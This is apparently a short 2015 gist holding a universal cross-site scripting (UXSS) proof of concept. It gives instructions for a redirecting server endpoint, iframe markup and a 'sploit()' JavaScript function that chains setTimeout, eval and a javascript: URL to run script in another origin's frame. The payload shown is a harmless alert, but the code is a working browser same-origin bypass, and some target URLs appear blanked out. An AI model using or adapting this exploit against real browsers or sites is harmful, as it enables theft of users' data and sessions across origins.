/gist:f0b1481f0ae5424454f3 Secret

Created Feb 3, 2015
// From
// Sample: UXSS against
// Make the URI /1 on your server respond with the HTTP redirect:
< HTTP/1.1 302 Found
< Content-Type: text/html;charset=utf-8
< Location:
// XSS into
<iframe id=i name=i src="/1"></iframe><br>
<iframe src="" onload='sploit()'></iframe><br>
function sploit(){
  var payload = 'alert(location.href);';
  frames[0].setTimeout("alert(eval('x=top.frames[1];d=new Date;while((new Date)-d<3000)alert(\\'An error occurred.\\');x.location=\\'javascript:%22%3Cscript%3E"+encodeURIComponent(payload)+"%3C/script%3E%22\\';'))",1);
}